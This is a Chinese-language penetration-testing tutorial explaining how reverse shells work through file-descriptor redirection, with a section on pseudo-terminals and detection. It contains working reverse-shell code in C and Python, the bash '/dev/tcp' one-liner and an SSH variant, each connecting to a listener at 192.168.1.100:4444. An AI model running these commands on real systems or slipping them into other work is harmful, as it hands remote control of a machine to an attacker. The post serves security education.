【渗透测试】反弹 Shell 技术详解(一)
反弹 Shell 技术详解
一、前置知识
反弹 shell(Reverse Shell)是一种技术,攻击者利用它可以在远程主机上获得一个交互式的命令行接口。通常情况下,反弹 shell 会将标准输入(stdin)、标准输出(stdout)和标准错误(stderr)重定向到网络套接字(socket),以便在远程主机上执行命令并接收结果。攻击者的服务端通过监听来自受害服务器的请求,对目标服务器下发指令并获取执行结果,以达到控制受害服务器的目的。
二、反弹 Shell 的基本原理
1. 典型反弹 Shell 的原理
在典型的反弹 shell 中,攻击者会创建一个套接字(socket),并将其绑定到标准输入、输出和错误的文件描述符(0, 1, 2)。这样做的目的是让所有用户输入、程序输出和错误信息都通过这个套接字传输到远程服务器。
2. 文件描述符重定向
为了实现反弹 shell,一般需要以下几个步骤:
- 创建一个套接字 并连接到远程服务器。
- 使用
dup2()系统调用将 标准输入(0)、标准输出(1)和标准错误(2)重定向到该套接字。 - 执行一个新的 shell(如
/bin/sh或/bin/bash),使得新启动的 shell 使用这些重定向的文件描述符。
C 语言实现示例:
int main() {
int sockfd;
struct sockaddr_in server_addr;
// 创建套接字
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0) {
perror("Socket creation failed");
return -1;
}
// 设置服务器地址
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(4444); // 目标端口
inet_pton(AF_INET, "192.168.1.100", &server_addr.sin_addr); // 目标IP地址
// 连接到服务器
if (connect(sockfd, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) {
perror("Connection failed");
return -1;
}
// 将标准输入、输出和错误重定向到套接字
dup2(sockfd, 0); // stdin
dup2(sockfd, 1); // stdout
dup2(sockfd, 2); // stderr
// 执行新的 shell
execve("/bin/sh", NULL, NULL);
close(sockfd);
return 0;
}
3. 关于文件描述符 0 1 2 的使用
并不是所有的反弹 shell 实现都严格使用文件描述符 0, 1, 2 指向套接字。虽然这是最常见的方式,但也有其他方法可以实现类似的效果:
-
直接使用套接字文件描述符
bash -i >& /dev/tcp/192.168.1.100/4444 0>&1 -
使用其他文件描述符
int sockfd = socket(AF_INET, SOCK_STREAM, 0); dup2(sockfd, 10); // 使用文件描述符 10 作为输出 dup2(sockfd, 11); // 使用文件描述符 11 作为输入 dup2(sockfd, 12); // 使用文件描述符 12 作为错误 -
使用管道或者命名管道
复杂的反弹 shell 实现可能会使用管道(pipe)或命名管道(FIFO)来实现数据的传递,而不是直接使用套接字文件描述符。
三、几种常见的反弹 Shell 的实现方式对比
使用 Bash 实现反弹 Shell
工作机制
Bash 是一个 Unix shell 和命令语言,广泛用于脚本编写和命令行操作。可以直接使用 Bash 内置功能来创建一个连接到远程服务器的交互式 shell。
文件描述符处理
bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
- 0 (stdin): 标准输入被重定向到 /dev/tcp/192.168.1.100/4444
- 1 (stdout): 标准输出被重定向到 /dev/tcp/192.168.1.100/4444
- 2 (stderr): 标准错误被重定向到 /dev/tcp/192.168.1.100/4444
基于网络套接字 Socket 的反弹 Shell 实现
示例代码【Python】
import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.100", 4444))
os.dup2(s.fileno(), 0) # 将标准输入重定向到套接字
os.dup2(s.fileno(), 1) # 将标准输出重定向到套接字
os.dup2(s.fileno(), 2) # 将标准错误重定向到套接字
subprocess.call(["/bin/sh", "-i"]) # 启动交互式 Bash shell
基于 SSH 的反弹 Shell 实现
示例代码【SSH】
ssh -R 4444:localhost:22 user@remote_server "bash -i >& /dev/tcp/localhost/4444 0>&1"
命令解释如下:
ssh -R:启用 ssh 远程端口转发功能,远端服务器的该端口流量转发到本地(远端启用端口给本地的操作机用)-R 4444:localhost:22:在远程服务器上打开端口 4444,并将其转发到本地的 SSH 端口 22user@remote_server:指定远程服务器的用户名和地址"bash -i >& /dev/tcp/localhost/4444 0>&1":在远程服务器上启动一个交互式 Bash shell,并将其标准输入、输出和错误重定向到本地的 4444 端口。
其他反弹方式
- 基于各种编程语言实现,原理和上述雷同
- 基于各种第三方工具实现,原理上述相同
- 复杂的反弹 shell 语句,结合各种管道(包括命名管道),伪终端中转和内存文件实现等
其他知识补充
伪终端
伪终端是指在 Linux 系统中,由终端模拟器创建的一对字符设备,包括一个 master 端和一个 slave 端。
设备类型
- master 端:位于用户态,对应一个文件描述符,用于与终端模拟器(如终端窗口)交互。
- slave 端:位于
/dev/pts/目录下的一个文件,用于与运行在虚拟终端上的程序交互。
功能与作用
- 数据转发:伪终端驱动程序负责将 master 端的输入数据转发给 slave 端,反之亦然。例如,用户在终端窗口中输入的命令通过 master 端传送给 shell,shell 的输出则通过 slave 端返回给终端窗口显示。
- 虚拟化:允许在图形界面或远程连接中模拟实际终端的行为,使得程序能够像在真实终端上运行一样,处理键盘输入和屏幕输出。
应用场景
- 图形界面终端:如 xterm、gnome-terminal 等,通过伪终端实现用户与 shell 的交互。
- 远程 shell:如 ssh 连接,客户端和服务器之间通过伪终端中继输入和输出。
- 多路复用器:如 screen 和 tmux,通过伪终端实现会话的多路复用和切换。
技术实现
- 创建伪终端:通过打开
/dev/ptmx文件,系统会生成一个新的伪终端对,包括一个 master 和一个 slave 设备。 - 文件描述符:master 端是一个文件描述符,而 slave 端是一个
/dev/pts/nn文件,nn 是一个数字,表示特定的伪终端。
与终端的区别
- 终端(tty):是物理设备或虚拟控制台,如 tty1-6,直接连接到键盘和显示器。
- 伪终端(pty):是软件模拟的虚拟终端,用于图形界面或远程连接,提供与终端相似的功能。
安全性与检测
在反弹 Shell 的上下文中,伪终端可以被用来重定向 shell 的输入输出到网络连接,从而实现远程控制。例如,通过 bash -i >& /dev/tcp/10.10.XX.XX/666 0>&1 命令,可以将 shell 的输入输出重定向到指定的 TCP 地址,实现反弹 Shell 的功能。这种行为在安全检测中可能被视为异常,因为它绕过了正常的输入输出路径。
by 久违
好久没写了,抽空梳理点基础知识